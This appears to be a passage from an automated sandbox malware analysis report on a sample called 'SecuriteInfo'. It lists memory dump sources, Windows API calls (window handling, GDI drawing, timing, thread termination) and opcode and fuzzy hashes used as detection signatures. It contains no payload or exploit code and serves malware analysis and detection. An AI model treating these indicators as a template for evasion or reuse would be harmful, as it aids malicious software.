                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Show$Enable$MessageSend
                                                                        • String ID:
                                                                        • API String ID: 642888154-0
                                                                        • Opcode ID: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                                        • Instruction ID: a5db896fb2ae06c85211a956f566d4ff66a2da6af11bfa2c2b637766cd700386
                                                                        • Opcode Fuzzy Hash: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                                        • Instruction Fuzzy Hash: F4413C346003409FEB25CF24C588BA67BE1FF55304F1885AAEB599B3A1CB78A851CB58
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$Copy$ClearErrorLast
                                                                        • String ID: NULL Pointer assignment$Not an Object type
                                                                        • API String ID: 2487901850-572801152
                                                                        • Opcode ID: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                                        • Instruction ID: 7224d39ad4dd36db717bb7decd6d6f3456075e50b8db1d036073f09e8ed5fad7
                                                                        • Opcode Fuzzy Hash: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                                        • Instruction Fuzzy Hash: 70C1AFB1A00209ABDF14DF98C881FEEB7B9EB44304F10C55EE909AB341D7799D85CBA5
                                                                        APIs
                                                                        • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044881F
                                                                        • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                        • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                        • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                        • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                        • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Enable$Show$MessageSend
                                                                        • String ID:
                                                                        • API String ID: 1871949834-0
                                                                        • Opcode ID: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                                        • Instruction ID: ab733961f10eda6fa12bc0977b233c6b2b6736debfa9bed553c9f015fe8cd40e
                                                                        • Opcode Fuzzy Hash: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                                        • Instruction Fuzzy Hash: 6931B3B17443815BF7258E24CCC4BAFB7D0EB95345F08482EF58196291DBAC9845C75A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                                        • Instruction ID: c6101d665a98d140be62f029472ab7f8db1b0ce4c02a7c647e8453833b83309f
                                                                        • Opcode Fuzzy Hash: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                                        • Instruction Fuzzy Hash: 5F21B672204110ABEB108F699C85B6F7798EB49370F24463BF625C62E0DB74D8C1C76D
                                                                        APIs
                                                                        • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 00471A45
                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,00000000,?,00000001), ref: 00471A86
                                                                        • SendMessageW.USER32(?,00001303,00000000,00000000), ref: 00471AA8
                                                                        • ImageList_ReplaceIcon.COMCTL32(?,?,?,?,00000000,?,00000001), ref: 00471ABF
                                                                        • SendMessageW.USER32 ref: 00471AE3
                                                                        • DestroyIcon.USER32(?), ref: 00471AF4
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Icon$ImageList_MessageSend$CreateDestroyExtractReplace
                                                                        • String ID:
                                                                        • API String ID: 3611059338-0
                                                                        • Opcode ID: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                                        • Instruction ID: ff529b192773d28f9e5fe2f6f8d7a9043cb056f7fe4a3f7912da33dbd9270a4a
                                                                        • Opcode Fuzzy Hash: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                                        • Instruction Fuzzy Hash: FB21AB71600204AFEB10CF64DD85FAA73B5FF88700F10846EFA05AB290DBB4A9428B64
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: DestroyWindow$DeleteObject$IconMove
                                                                        • String ID:
                                                                        • API String ID: 1640429340-0
                                                                        • Opcode ID: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                                        • Instruction ID: 1af524ae86da71fe4f89171a472fc693caa25f853ed14bd6ff7d4c509651bbe6
                                                                        • Opcode Fuzzy Hash: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                                        • Instruction Fuzzy Hash: C6311874200A41DFC710DF24D9D8B3A77E9FB48712F0445AAE946CB262D778E848CB69
                                                                        APIs
                                                                          • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                          • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                        • _wcslen.LIBCMT ref: 004438CD
                                                                        • _wcslen.LIBCMT ref: 004438E6
                                                                        • _wcstok.LIBCMT ref: 004438F8
                                                                        • _wcslen.LIBCMT ref: 0044390C
                                                                        • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0044391A
                                                                        • _wcstok.LIBCMT ref: 00443931
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: _wcslen$_wcstok$ExtentPoint32Text_wcscpy
                                                                        • String ID:
                                                                        • API String ID: 3632110297-0
                                                                        • Opcode ID: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                                        • Instruction ID: d12b8bce329459066c03420e1b0c57cf331e6d1a2def9435cce8fb2ce1fb425a
                                                                        • Opcode Fuzzy Hash: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                                        • Instruction Fuzzy Hash: 9621B072900305ABDB10AF559C82AAFB7F8FF48711F64482EF95993301E678EA5087A5
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Destroy$DeleteMenuObject$IconWindow
                                                                        • String ID:
                                                                        • API String ID: 752480666-0
                                                                        • Opcode ID: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                                        • Instruction ID: 7b220c8407ffc283b2c26cc65a644285b0b18e1ed163c7e0472fb9f2b18bc557
                                                                        • Opcode Fuzzy Hash: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                                        • Instruction Fuzzy Hash: B7215970600A01DFD714DF29D9E8B3A7BA9BF49312F04855AE8468B352C738EC89CB59
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                        • String ID:
                                                                        • API String ID: 3275902921-0
                                                                        • Opcode ID: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                                        • Instruction ID: 11d86efc281b6c380d974b68bd8b9632be9d9c574e85584f431c859402bfc888
                                                                        • Opcode Fuzzy Hash: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                                        • Instruction Fuzzy Hash: 9C217C70200A01DFC714DF39D998A6AB7E4BF49311F10862EE959C7392D778D845CB58
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                        • String ID:
                                                                        • API String ID: 3275902921-0
                                                                        • Opcode ID: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                                        • Instruction ID: f2615e71845bffb995fe2c2b9381f89f67980fa6d4eb7dd8f13843e5971e4781
                                                                        • Opcode Fuzzy Hash: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                                        • Instruction Fuzzy Hash: 54213D70200A01DFD710EF25D9D4A2B37E9BF49312F10896EE945CB352D739D845CB69
                                                                        APIs
                                                                        • Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                        • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331D4
                                                                        • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331DE
                                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331E6
                                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331F0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                        • String ID:
                                                                        • API String ID: 2833360925-0
                                                                        • Opcode ID: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                                        • Instruction ID: f8c058edd9890a080c9b5d5c764251204f1987641da473bf5ecf7e3e358c806a
                                                                        • Opcode Fuzzy Hash: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                                        • Instruction Fuzzy Hash: 1911B632D0011DABCF00DFD9EA489EEB778FF49722F1145AAED04A6204DB755A01CBA4
                                                                        APIs
                                                                        • SendMessageW.USER32 ref: 004555C7
                                                                        • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004555E2
                                                                        • DeleteObject.GDI32(?), ref: 00455736
                                                                        • DeleteObject.GDI32(?), ref: 00455744
                                                                        • DestroyIcon.USER32(?), ref: 00455752
                                                                        • DestroyWindow.USER32(?), ref: 00455760
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: DeleteDestroyMessageObjectSend$IconWindow
                                                                        • String ID:
                                                                        • API String ID: 3691411573-0
                                                                        • Opcode ID: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                                                                        • Instruction ID: 7bbaf3a525edecc9c7f674a1bc178dbce74773f27e06def1294b58b6a87c9b54
                                                                        • Opcode Fuzzy Hash: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                                                                        • Instruction Fuzzy Hash: 3D116071204601DBC710DF69EDC8A2A77A8FB58322F10466AFD10DB292D779D849CB68
                                                                        APIs
                                                                          • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                          • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                          • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                          • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                          • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                        • MoveToEx.GDI32(?,?,?,00000000), ref: 004472A0
                                                                        • LineTo.GDI32(?,?,?), ref: 004472AC
                                                                        • MoveToEx.GDI32(?,?,?,00000000), ref: 004472BA
                                                                        • LineTo.GDI32(?,?,?), ref: 004472C6
                                                                        • EndPath.GDI32(?), ref: 004472D6
                                                                        • StrokePath.GDI32(?), ref: 004472E4
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                                                                        • String ID:
                                                                        • API String ID: 372113273-0
                                                                        • Opcode ID: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                                        • Instruction ID: 9972a7b2ea06d4c5ad2b855a17b8a9a0d98d12ec42d2644493c4a69bc6448ed6
                                                                        • Opcode Fuzzy Hash: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                                        • Instruction Fuzzy Hash: 7701BC76101214BBE3119B44ED8DFDF7B6CEF4A710F104259FA01A629187F42A02CBBD
                                                                        APIs
                                                                        • GetDC.USER32(00000000), ref: 0044CC6D
                                                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC78
                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC84
                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 0044CC90
                                                                        • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCA8
                                                                        • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCB9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: CapsDevice$Release
                                                                        • String ID:
                                                                        • API String ID: 1035833867-0
                                                                        • Opcode ID: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                                        • Instruction ID: 48d0fedbc9b5ed1f8cca1220e36c4d83aa6571d18a2c693a8c9b468b660f0fbb
                                                                        • Opcode Fuzzy Hash: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                                        • Instruction Fuzzy Hash: 60015276240214BFFB009F95DD89F5A7BACFF54751F14802EFF089B240D6B098008BA4
                                                                        APIs
                                                                        • __getptd.LIBCMT ref: 0041708E
                                                                          • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                                          • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                                        • __amsg_exit.LIBCMT ref: 004170AE
                                                                        • __lock.LIBCMT ref: 004170BE
                                                                        • InterlockedDecrement.KERNEL32(?), ref: 004170DB
                                                                        • _free.LIBCMT ref: 004170EE
                                                                        • InterlockedIncrement.KERNEL32(009817F0), ref: 00417106
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                        • String ID:
                                                                        • API String ID: 3470314060-0
                                                                        • Opcode ID: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                                                                        • Instruction ID: d92c7102fc6d098775a0f5363b9b5483e5b10d08a1c29475ed017091780ded1e
                                                                        • Opcode Fuzzy Hash: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                                                                        • Instruction Fuzzy Hash: 3301AD32905711ABC721ABA698497DE7BB0AB04724F15416BF950A7381CB3CAAC1CFDD
                                                                        APIs
                                                                        • InterlockedExchange.KERNEL32(?,?), ref: 0044B655
                                                                        • EnterCriticalSection.KERNEL32(?), ref: 0044B666
                                                                        • TerminateThread.KERNEL32(?,000001F6), ref: 0044B674
                                                                        • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B682
                                                                          • Part of subcall function 00432614: CloseHandle.KERNEL32(00000000,00000000,?,0044B68E,00000000,?,000003E8,?,000001F6), ref: 00432622
                                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B697
                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 0044B69E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
